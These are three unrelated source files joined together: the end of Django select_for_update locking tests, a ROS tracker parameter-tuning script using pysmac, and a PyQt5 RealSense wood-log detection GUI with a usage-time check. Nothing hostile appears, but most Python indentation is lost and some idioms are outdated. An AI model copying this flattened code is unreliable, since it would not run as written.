@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
If a SELECT...FOR UPDATE NOWAIT is run on a database backend
that supports FOR UPDATE but not NOWAIT, then we should find
that a DatabaseError is raised.
"""
self.assertRaises(
DatabaseError,
list,
Person.objects.all().select_for_update(nowait=True)
)
def run_select_for_update(self, status, nowait=False):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
transaction.enter_transaction_management()
people = list(
Person.objects.all().select_for_update(nowait=nowait)
)
people[0].name = 'Fred'
people[0].save()
transaction.commit()
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
transaction.abort()
connection.close()
@requires_threading
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
Check that a thread running a select_for_update that
accesses rows being touched by a similar operation
on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
        self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@requires_threading
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Check that running a raw query which can't obtain a FOR UPDATE lock
raises the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
def test_transaction_dirty_managed(self):
""" Check that a select_for_update sets the transaction to be
dirty when executed under txn management. Setting the txn dirty
means that it will be either committed or rolled back by Django,
which will release any locks held by the SELECT FOR UPDATE.
"""
people = list(Person.objects.select_for_update())
self.assertTrue(transaction.is_dirty())
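# Illustrative sketch only (not part of the original test suite): the pattern these tests
# exercise is application code locking rows inside a transaction before mutating them, e.g.
#
#     from django.db import transaction
#
#     with transaction.commit_on_success():
#         person = Person.objects.select_for_update().get(pk=some_pk)  # some_pk is hypothetical
#         person.name = 'Fred'
#         person.save()
#
# The SELECT ... FOR UPDATE lock is released when the surrounding transaction commits or
# rolls back, which is why test_transaction_dirty_managed checks that the transaction is
# marked dirty.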
|
tunerScriptDeletion.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Fabian Girrbach, Social Robotics Lab, University of Freiburg
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Dependencies for ROS
import rospy
import rospkg
from std_msgs.msg import Float32, Bool
# Other dependencies
import yaml
from collections import namedtuple
from time import time, sleep
import subprocess
from signal import SIGKILL, SIGTERM
import os
from multiprocessing import Process, Pipe
# PySMAC
import pysmac
# definition of the parameters which should be optimized: (type, [lower, upper], default)
parameters_to_optimize = dict(
    track_is_mature_after_total_num_matches=("integer", [1, 300], 100),
    max_occlusions_before_deletion_of_mature_track=("integer", [1, 250], 50),
    max_occlusions_before_deletion=("integer", [1, 250], 20),
    process_noise_level=("real", [1e-5, 2.5], 0.1),
    measurement_noise=("real", [1e-5, 2.5], 0.1),
)
# list of files where the parameters for the optimization should be found
parameter_files_to_search = ['/launch/params/occlusion_manager_basic_tuning.yaml', '/launch/params/ekf_tuning.yaml',]
# list of ros package names where parameters can be found
packages_for_parameters = ['srl_nearest_neighbor_tracker']
# roslaunch commands for several instances where tuning should happen
roslaunch_commands = [['roslaunch', 'srl_nearest_neighbor_tracker' , 'pedsim_tuning.launch']]
# List of forbidden configurations
forbidden_clauses = ['{(max_occlusions_before_deletion_of_mature_track < max_occlusions_before_deletion)}']
parameter_list = []
fail_result = -1.0
mota_result = -1.0
def find_parameters():
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
    for package_name in packages_for_parameters:
package_path = rospack.get_path(package_name)
for file in parameter_files_to_search:
param_file = package_path + file
try:
params_in_file = yaml.load(open(param_file))
for param_key in parameters_to_optimize:
if param_key in params_in_file:
print 'Found {} in {} paramfile {}'.format(param_key, param_file, parameters_to_optimize[param_key])
new_param = {'name':param_key, 'path':param_file, 'default':parameters_to_optimize[param_key][-1], 'current':50}
parameter_list.append(new_param)
except:
pass
def write_parameters():
print "inside write parameters"
for param in parameter_list:
print "current param {}".format(param)
with open(param['path'], 'r') as param_file:
params_in_file = yaml.load(param_file)
params_in_file[param['name']] = param['current']
with open(param['path'], 'w') as param_file:
param_file.write(yaml.dump(params_in_file, default_flow_style=True) )
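# Illustrative note (assumed shape, inferred from find_parameters above): each entry of
# parameter_list is expected to look roughly like
#   {'name': 'process_noise_level',
#    'path': '<package_path>/launch/params/ekf_tuning.yaml',
#    'default': 0.1,
#    'current': 50}
# write_parameters() then rewrites the matching key of that YAML file with the 'current' value.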
def resultCallback(result):
print "PyMot results received {}".format(result)
    global mota_result, process_sim
mota_result = result.data
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
rospy.signal_shutdown('Mota result received')
def clean_ros_logs():
    # After many iterations ROS has gathered a lot of log files, therefore we clean them after each iteration
subprocess.call(['rosclean','purge','-y'])
def start_node(child_conn, ros_command):
clean_ros_logs()
# launch tracker and everything which comes with it
global process_sim, mota_result
mota_result = fail_result
process_sim = subprocess.Popen(ros_command, preexec_fn=os.setsid)
node = rospy.init_node('tuning_node', anonymous=True)
while rospy.is_shutdown():
print 'Waiting for ROS to start'
sleep(1)
rospy.Subscriber("/pymot_result", Float32, resultCallback)
rospy.spin()
sleep(3)
tuning_object = dict()
tuning_object['result'] = mota_result
child_conn.send(tuning_object)
def optimize_parameters(**kwargs):
print "Function was called with arguments: {}".format(kwargs)
# Modify values in parameter list depending on passed values
for arg in kwargs.keys():
print "Current key argument: {}".format(arg)
if arg == "instance":
roslaunch_command = roslaunch_commands[kwargs[arg]]
print "Current ROS Launch command is {}".format(roslaunch_command)
continue
try:
current = next(param for param in parameter_list if param['name']==arg)
current['current'] = kwargs[arg]
except:
pass
write_parameters()
sleep(0.5)
parent_conn, child_conn = Pipe()
p = Process(target=start_node, args=(child_conn,roslaunch_command,))
p.start()
result = parent_conn.recv()
print 'Received current result {}'.format(result['result'])
p.join()
p.terminate()
return -result['result']
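# Illustrative only (assumption about how pysmac drives the objective): SMAC calls
# optimize_parameters() with the sampled values as keyword arguments, plus an 'instance'
# index that selects one of roslaunch_commands, e.g.
#   optimize_parameters(instance=0,
#                       track_is_mature_after_total_num_matches=120,
#                       max_occlusions_before_deletion_of_mature_track=60,
#                       max_occlusions_before_deletion=15,
#                       process_noise_level=0.35,
#                       measurement_noise=0.02)
# The negated MOTA is returned above because SMAC minimizes the objective.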
def init_optimization():
opt = pysmac.SMAC_optimizer(working_directory= '/home/fabian/tuning_deletion_logic/',persistent_files=True, debug = False)
parameter_definition= parameters_to_optimize
print parameter_definition
    value, parameters = opt.minimize(optimize_parameters  # the function to be minimized
                                     , 500  # the maximum number of function evaluations
                                     , parameter_definition  # dict of parameter definitions
                                     , forbidden_clauses=forbidden_clauses  # list of forbidden clauses
                                     , t_limit_function_s=360  # time limit for one tuning iteration
                                     , num_runs=2  # number of independent tuning runs
                                     , num_train_instances=len(roslaunch_commands)  # number of datasets used for tuning
                                     , deterministic=True)  # deterministic results
print('The minimum value %f was found for the configurations %s'%(value, parameters))
for param_key in parameters.keys():
try:
current = next(param for param in parameter_list if param['name']==param_key)
current['current'] = parameters[param_key]
except:
pass
print("Writing best parameter configuration to param file(s) {}".format(parameter_files_to_search))
write_parameters()
print("Exited sucessfully!")
if __name__ == '__main__':
try:
find_parameters()
init_optimization()
except rospy.ROSInterruptException:
pass
|
detection._po.py
|
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from PyQt5.QtCore import QTimer
from scripts import config
if config.DEBUG:
from scripts.wood_detection import Ui_dialog
from scripts.parameter import Ui_Dialog_Child
from scripts.notes import Ui_Dialog_Notes
from scripts.utils import new_show_result, show_result, new_show_result_2, new_show_result_3, creat_match_graph_txt, \
get_result_from_meger_file
from scripts.utils import new_show_result_21
from scripts.merger_result_old import get_final_result, get_final_result_multirows
import scripts.utils
else:
from scripts.wood_detection import Ui_dialog
from scripts.parameter import Ui_Dialog_Child
from scripts.notes import Ui_Dialog_Notes
from scripts.utils import new_show_result, show_result, new_show_result_2,new_show_result_3, creat_match_graph_txt, get_result_from_meger_file
from scripts.utils import new_show_result_21
# from scripts.merger_result import get_final_result, get_final_result_multirows
from scripts.merger_result_v2 import get_final_result,get_final_result_multirows
import scripts.utils
from PIL import Image
import cv2
import numpy as np
import threading
import time
import shutil
from scripts.softp import SoftwareProtecttion
import pyrealsense2 as pr
# Inherit from the original UI design classes and add the widget callback functions.
# Keeping the layout and the callbacks separate makes both easy to modify: if the original
# layout class changes, only wood_detection_ui.py needs to be replaced.
# The object_name of each widget must stay consistent; the default naming scheme is used here.
#######################################################
# image button:            pushButton
# detect button:           pushButton_2
# pause button:            pushButton_3
# original image view:     graphicsView
# detection result view:   graphicsView_2
class Detection_Notes(QDialog, Ui_Dialog_Notes):
def __init__(self):
super(Detection_Notes, self).__init__()
self.setupUi(self)
class Detection_Child(QDialog, Ui_Dialog_Child):
def __init__(self):
super(Detection_Child, self).__init__()
self.setupUi(self)
self.checkBox.setChecked(True)
self.horizontalSlider_9.setEnabled(False)
self.checkBox.clicked.connect(self.adjust)
self.pushButton.clicked.connect(self.reset)
self.expos = True
self.expos_init = [0, 50, 64, 300, 0, 64, 50, 4600]
self.reset_flag = False
def adjust(self):
if self.checkBox.isChecked() == False:
self.expos = False
self.horizontalSlider_9.setEnabled(True)
else:
self.expos = True
self.horizontalSlider_9.setEnabled(False)
def update(self):
if self.reset_flag == True:
self.reset_flag = False
return self.expos_init
brightness = self.horizontalSlider.value()
contrast = self.horizontalSlider_2.value()
grain = self.horizontalSlider_3.value()
gamma = self.horizontalSlider_4.value()
hue = self.horizontalSlider_5.value()
staturation = self.horizontalSlider_7.value()
sharpness = self.horizontalSlider_8.value()
white_balance = self.horizontalSlider_6.value()
results = [brightness, contrast, grain, gamma, hue, staturation, sharpness, white_balance]
return results
def exposfun(self):
if self.reset_flag == True:
self.expos = True
return 'reset'
expos = 0
if self.expos == False:
expos = self.horizontalSlider_9.value()
else:
return 'auto'
return expos
def reset(self):
self.horizontalSlider.setValue(self.expos_init[0])
self.horizontalSlider_2.setValue(self.expos_init[1])
self.horizontalSlider_3.setValue(self.expos_init[2])
self.horizontalSlider_4.setValue(self.expos_init[3])
self.horizontalSlider_5.setValue(self.expos_init[4])
self.horizontalSlider_7.setValue(self.expos_init[5])
self.horizontalSlider_8.setValue(self.expos_init[6])
self.horizontalSlider_6.setValue(self.expos_init[7])
self.horizontalSlider_9.setEnabled(False)
self.checkBox.setChecked(True)
self.reset_flag = True
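# Illustrative note (assumption inferred from Detection_Child.update() and the slider order
# above): expos_init stores the RealSense colour-sensor defaults as
#   [brightness, contrast, gain, gamma, hue, saturation, sharpness, white_balance]
# i.e. the same order in which videoplay() later applies them via sensor.set_option().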
class Detection_Ui(QtWidgets.QMainWindow,Ui_dialog):
def __init__(self):
super(Detection_Ui, self).__init__()
self.setupUi(self)
        # Set up the widget callback functions
        # (registered here directly; could later be refactored into inheritance)
        # software protection
self.softp = SoftwareProtecttion(elapsed_time=90, elapsed_time_flag=True, mac_protection_flag=False)
self.child = Detection_Child()
self.notes = Detection_Notes()
self.timer = QTimer()
self.org_img = None
self.img_list = []
self.img_list_raw = []
self.isimage = True
self.isvideo = False
self.ismulti = False
self.issaveimage = False
self.savevideo_flag = False
self.save_woods_nums = 1
self.image_num = 0
self.video_reset = False
self.paly_terminate_flag = False
self.paly_reset_flag = False
self.widget.show()
self.widget_2.hide()
self.pushButton.clicked.connect(self.open_file_and_show_img)
self.pushButton_2.clicked.connect(self.detect)
self.pushButton_3.clicked.connect(self.saveimage)
self.pushButton_4.clicked.connect(self.videoplay)
self.pushButton_5.clicked.connect(self.videoreset)
self.pushButton_6.clicked.connect(self.videoterminate)
self.pushButton_7.clicked.connect(self.parameteradjust)
self.adjust = False
self.expos_init = [0, 50, 64, 300, 0, 64, 50, 4600]
self.timer.timeout.connect(self.close_win)
self.radioButton.clicked.connect(self.radioButtonimage)
self.radioButton_2.clicked.connect(self.radioButtonvideo)
self.radioButton_3.clicked.connect(self.radioButtonmulti)
self.radioButton_4.clicked.connect(self.radioButtonSaveImage)
self.stopEvent = threading.Event()
self.stopEvent.clear()
self.radioButton.setChecked(True)
self.lineEdit.setReadOnly(True)
self.config_file = './scripts/config.py'
self.class_names = ['Wood', 'Wood']
self.checkpoint_file_list = ['model.pth', 'epoch_1000.pth', 'epoch_1500.pth']
self.pause_det = False
self.time = 0
self.now = ""
def closeEvent(self, event):
"""
对MainWindow的函数closeEvent进行重构
退出软件时结束所有进程
:param event:
:return:
"""
reply = QtWidgets.QMessageBox.question(self,
'本程序',
"是否要退出程序?",
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if reply == QtWidgets.QMessageBox.Yes:
event.accept()
#print(self.issaveimage)
sys.exit(0)
else:
event.ignore()
def close_win(self):
"""
重写closeEvent方法,实现dialog窗体关闭时执行一些代码
:param event: close()触发的事件
:return: None
"""
#reply = QMessageBox.Warning(self, '本程序',
# "你的软件使用时间或mac地址异常,将强制退出?")
# if reply == QtWidgets.QMessageBox.Yes:
# QMainWindow.close()
# else:
# QMainWindow.close()
self.textEdit.setText("软件使用时间或mac地址异常,将在10后强制退出!")
QApplication.processEvents()
time.sleep(10)
sys.exit(0)
    # Pause-signal handling
    def detect_command(self):
        if self.pause_det == False:
            self.pause_det = True
            self.pushButton_3.setText("继续")
        else:
            self.pause_det = False
            self.pushButton_3.setText("暂停")
    # Show the detection result in the second graphics view and print the related info in the text box
def radioButtonimage(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始单图测试!" + '\n')
QApplication.processEvents()
self.isimage = True
self.isvideo = False
self.ismulti = False
self.issaveimage = False
self.lineEdit.setReadOnly(True)
self.lineEdit_2.setReadOnly(True)
self.stopEvent.set()
self.paly_reset_flag = True
self.widget.show()
self.widget_2.hide()
def radioButtonvideo(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始视频测试!" + '\n')
QApplication.processEvents()
self.isvideo = True
self.isimage = False
self.ismulti = False
self.issaveimage = False
self.lineEdit.setReadOnly(True)
self.lineEdit_2.setReadOnly(True)
self.paly_reset_flag = True
self.widget.show()
self.widget_2.hide()
def radioButtonmulti(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始多图测试!" + '\n')
QApplication.processEvents()
self.lineEdit.setReadOnly(False)
self.lineEdit_2.setReadOnly(True)
self.isvideo = False
self.isimage = False
self.ismulti = True
self.issaveimage = False
self.stopEvent.set()
self.paly_reset_flag = True
self.widget.hide()
self.widget_2.show()
def radioButtonSaveImage(self):
self.textEdit.setText("请保证摄像头已经插入!" + '\n')
self.lineEdit.setReadOnly(True)
self.isvideo = False
self.isimage = False
self.ismulti = False
self.issaveimage = True
self.paly_reset_flag = False
self.stopEvent.set()
self.widget.show()
self.widget_2.hide()
self.lineEdit_2.setReadOnly(False)
self.cur_acquire_flag = 0
def parameteradjust(self):
self.adjust = True
self.child.show()
def videoplay(self):
if self.issaveimage:
self.pushButton_3.setEnabled(True)
self.notes.show()
self.notes.textBrowser.setText('\n \n')
self.notes.textBrowser.append('\t \t \t 采集一排请按木头堆从左至右的顺序拍摄' + '\n')
self.notes.textBrowser.append(' 请保证一个木头堆的拍摄角度基本一致,尽量在一个水平线上移动拍摄,且保证相邻帧的重叠面积在50%左右,且拍摄清晰没有模糊' + '\n')
self.notes.textBrowser.append(' 具体的顺序如下: \n ')
self.notes.textBrowser.append(' \t \t \t 1.png -> 2.png -> 3.png -> 4.png -> 5.png' + '\n')
self.notes.textBrowser.append(' 采集二排请按木头堆指定从左至右,先下再上,再下再上顺序拍摄' + '\n')
self.notes.textBrowser.append(' 并保证一个木头堆的拍摄角度基本一致,尽量在一个水平线上移动拍摄,且保证相邻帧的重叠面积在50%左右,且拍摄清晰没有模糊' + '\n')
self.notes.textBrowser.append(' 具体的顺序如下: \n')
self.notes.textBrowser.append(
'\t \t \t 第二排:2.png -> 4.png -> 6.png -> 8.png -> 10.png' + '\n' + '\t \t \t 第一排:1.png -> 3.png -> 5.png -> 7.png -> 9.png' + '\n')
self.paly_reset_flag = False
save_folders = './save/imgs'
# if os.path.exists(save_folders):
# shutil.rmtree(save_folders)
if not os.path.exists(save_folders):
os.makedirs(save_folders)
self.now = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
pl = pr.pipeline()
con = pr.config()
con.enable_stream(pr.stream.depth, 640, 480, pr.format.z16, 15)
con.enable_stream(pr.stream.color, 640, 480, pr.format.bgr8, 15)
# Start streaming
pl.start(con)
sensor = pl.get_active_profile().get_device().query_sensors()[1]
sensor.set_option(pr.option.enable_auto_exposure, 1)
# print('herehere')
sensor.set_option(pr.option.enable_auto_exposure, 1)
expos = 0
sensor.set_option(pr.option.brightness, self.expos_init[0])
sensor.set_option(pr.option.contrast, self.expos_init[1])
sensor.set_option(pr.option.gain, self.expos_init[2])
sensor.set_option(pr.option.gamma, self.expos_init[3])
sensor.set_option(pr.option.hue, self.expos_init[4])
sensor.set_option(pr.option.saturation, self.expos_init[5])
sensor.set_option(pr.option.sharpness, self.expos_init[6])
sensor.set_option(pr.option.white_balance, self.expos_init[7])
while True:
sticher_flag = self.lineEdit_2.text()
if self.paly_reset_flag == True:
self.lineEdit_2.setEnabled(True)
if sticher_flag is "":
self.save_woods_nums = 1
self.textEdit.setText('需采集排数值为空,必须为大于0的整数,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag or int(sticher_flag) > 2:
self.save_woods_nums = 1
self.textEdit.setText('需采集排数值有误,必须为大于0小于3的整数,请重新输入!')
QApplication.processEvents()
else:
self.save_woods_nums += 1
self.textEdit.setText('开始采集第' + str(self.save_woods_nums) + '个木头堆!!' + '\n')
break
if self.paly_terminate_flag == False:
if self.adjust == True:
# self.adjust = False
expos = self.child.exposfun()
results = self.child.update()
if expos == 'auto':
# Set the exposure anytime during the operation
sensor.set_option(pr.option.enable_auto_exposure, 1)
elif expos == 'reset':
sensor.set_option(pr.option.enable_auto_exposure, 1)
else:
sensor.set_option(pr.option.enable_auto_exposure, 0)
sensor.set_option(pr.option.exposure, int(expos))
brightness = results[0]
contrast = results[1]
gain = results[2]
gamma = results[3]
hue = results[4]
staturation = results[5]
sharpness = results[6]
white_balance = results[7]
# print('brightness', brightness)
if expos == 'reset':
sensor.set_option(pr.option.brightness, brightness)
sensor.set_option(pr.option.contrast, contrast)
sensor.set_option(pr.option.gain, gain)
sensor.set_option(pr.option.gamma, gamma)
sensor.set_option(pr.option.hue, hue)
sensor.set_option(pr.option.saturation, staturation)
sensor.set_option(pr.option.sharpness, sharpness)
sensor.set_option(pr.option.white_balance, white_balance)
else:
if brightness != self.expos_init[0]:
sensor.set_option(pr.option.brightness, brightness)
if contrast != self.expos_init[1]:
sensor.set_option(pr.option.contrast, contrast)
if gain != self.expos_init[2]:
sensor.set_option(pr.option.gain, gain)
if gamma != self.expos_init[3]:
sensor.set_option(pr.option.gamma, gamma)
if hue != self.expos_init[4]:
sensor.set_option(pr.option.hue, hue)
if staturation != self.expos_init[5]:
sensor.set_option(pr.option.saturation, staturation)
if sharpness != self.expos_init[6]:
sensor.set_option(pr.option.sharpness, sharpness)
if white_balance != self.expos_init[7]:
sensor.set_option(pr.option.white_balance, white_balance)
self.expos_init = results
frames = pl.wait_for_frames()
depth_frame = frames.get_depth_frame()
color_frame = frames.get_color_frame()
if not depth_frame or not color_frame:
continue
# Convert images to numpy arrays
depth_image = np.asanyarray(depth_frame.get_data())
color_image = np.asanyarray(color_frame.get_data())
# Apply colormap on depth image (image must be converted to 8-bit per pixel first)
depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
if self.savevideo_flag == True:
self.lineEdit_2.setEnabled(False)
self.savevideo_flag = False
if sticher_flag is "":
self.image_num = 0
self.textEdit.setText('需采集排数值为空,必须为大于0的整数,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag or int(
sticher_flag) > 2:
self.image_num = 0
self.textEdit.setText('需采集排数值有误,必须为大于0小于3的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag) != self.cur_acquire_flag:
self.image_num = 1
# self.save_woods_nums += 1
self.cur_acquire_flag = int(sticher_flag)
self.textEdit.setText('请看到保存成功标志后,再继续保存下一张!')
self.textEdit.append('当前保存第' + str(self.image_num) + '个木头局部图片')
QApplication.processEvents()
save_folders_other = save_folders + '/' + sticher_flag + '_line'
if not os.path.exists(save_folders_other):
os.makedirs(save_folders_other)
save_sub_folders = save_folders_other + '/' + self.now
if not os.path.exists(save_sub_folders):
os.makedirs(save_sub_folders)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '_depth.tif', depth_image)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '.png', color_image)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '_depth.png', depth_colormap)
self.textEdit.setText('保存成功!')
img1 = color_image
img2 = depth_colormap
if img1 is None:
continue
if img2 is None:
continue
img1 = cv2.resize(img1, (540, 510))
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img2 = cv2.resize(img2, (540, 510))
x = img1.shape[1] # 获取图像大小
y = img1.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame1 = QImage(img1, x, y, QImage.Format_RGB888)
pix1 = QPixmap.fromImage(frame1)
self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene1 = QGraphicsScene() # 创建场景
self.scene1.addItem(self.item1)
frame2 = QImage(img2, x, y, QImage.Format_RGB888)
pix2 = QPixmap.fromImage(frame2)
self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene2 = QGraphicsScene() # 创建场景
self.scene2.addItem(self.item2)
self.graphicsView.setScene(self.scene1)
self.graphicsView_2.setScene(self.scene2)
QApplication.processEvents()
else:
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
def videoterminate(self):
if self.paly_terminate_flag == False:
self.paly_terminate_flag = True
self.pushButton_6.setText('继续')
self.pushButton_4.setEnabled(False)
self.pushButton_3.setEnabled(False)
QApplication.processEvents()
else:
self.paly_terminate_flag = False
self.pushButton_6.setText('暂停')
self.pushButton_4.setEnabled(True)
self.pushButton_3.setEnabled(True)
QApplication.processEvents()
# self.graphicsView.setScene(None)
# self.graphicsView_2.setScene(None)
# QApplication.processEvents()
def saveimage(self):
self.savevideo_flag = True
self.image_num += 1
def videoreset(self):
# self.now = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
self.image_num = 0
self.paly_reset_flag = True
self.pushButton_3.setEnabled(False)
QApplication.processEvents()
def detect(self):
quit_flag = self.softp.is_over_time()
if quit_flag == True:
self.timer.start(1000) # 计时1s触发关闭程序
else:
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
# build the model from a config file and a checkpoint file
if self.isimage == True:
start = time.time()
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, self.org_img)
else:
result = []
self.time = time.time() - start
####得到检测结果
if not config.DEBUG:
result_img, inds, cal_results=new_show_result_2(self.org_img, self.filename, result, self.class_names, score_thr=0.5)
###将检测结果显示到图窗上
result_img = cv2.cvtColor(np.asarray(result_img),cv2.COLOR_RGB2BGR)
else:
result_img = np.zeros((520,520,3),dtype=np.uint8)
inds = [0,0]
pixels_output = [0,0]
img = cv2.resize(result_img, (520, 520))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
x = img.shape[1] # 获取图像大小
y = img.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame = QImage(img, x, y, QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_2.setScene(self.scene)
self.textEdit.setText("检测木头个数:" + str(len(inds)) + '\n')
self.textEdit.append("单张图片检测运行时间:" + str(self.time) + 's' + '\n')
self.textEdit.append('每根木头的长轴和短轴长度为:\n')
#print(cal_results)
[self.textEdit.append('长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for cal_result in cal_results]
elif self.isvideo == True:
#self.update()
self.pushButton_2.setText("检测中")
QApplication.processEvents()
#self.Video_Detect()
                th = threading.Thread(target=self.Video_Detect)
th.start()
elif self.ismulti == True:
self.multi_image()
def Video_Detect(self):
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
self.graphicsView.setScene(None)
result_dir_path = './results_video/'
if not os.path.exists(result_dir_path):
os.mkdir(result_dir_path)
self.cap = cv2.VideoCapture(self.current_filename)
video_length = self.cap.get(7)
#print(video_length)
frame_num = 0
start = time.time()
#print(self.current_filename)
fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
out_file_name = result_dir_path + self.current_filename.split('/')[-1]
self.frameRate = self.cap.get(cv2.CAP_PROP_FPS)
out = cv2.VideoWriter(out_file_name, fourcc, self.frameRate, (520, 480))
while self.cap.isOpened():
success, frame = self.cap.read()
if True == self.stopEvent.is_set():
self.stopEvent.clear()
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
break
if success:
#print("processing....")
frame_num += 1
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
img_i = frame.copy()
img_i = cv2.resize(img_i, (520, 520))
img_i = cv2.cvtColor(img_i, cv2.COLOR_BGR2RGB)
img_i = QImage(img_i, img_i.shape[1], img_i.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(img_i)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
